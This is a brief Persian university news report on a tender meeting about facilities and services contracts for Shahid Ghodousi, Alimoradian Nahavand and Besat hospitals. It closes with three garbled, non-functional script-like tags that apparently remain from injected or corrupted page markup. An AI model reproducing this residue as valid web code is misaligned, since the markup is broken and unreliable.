برگزاری جلسه مناقصه تاسیسات ستاد و خدمات بیمارستانهای شهید قدوسی ،علیمرادیان نهاوند و مرکز آموزشی درمانی بعثت

جلسه مناقصه تاسیسات ستاد و خدمات بیمارستانهای شهید قدوسی ،علیمرادیان نهاوند و مرکز آموزشی درمانی بعثت در دفتر مدیریت امور رفاهی و پشتیبانی دانشگاه برگزار شد.
به گزارش روابط عمومی معاونت توسعه مدیریت و منابع دانشگاه، جلسه مناقصه تاسیسات ستاد و خدمات بیمارستانهای شهید قدوسی ،علیمرادیان نهاوند و مرکز آموزشی درمانی بعثت با حضور آقایانی مدیر امور رفاهی و پشتیبانی، دکتر نیاستی مدیر برنامه ریزی ، بودجه و پایش عملکرد، مدیران بیمارستان های مذکور و کارشناسانی از حراست و مدیریت امور مالی دانشگاه برگزار شد.

در این جلسه به مسائلی همچون، انتخاب پیمانکار، کیفیت و نحوه خدمات دهی کارکنان تاسیسات و خدمات و … پرداخته شد و نقاط قوت و قابل بهبود بررسی گردید.

<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>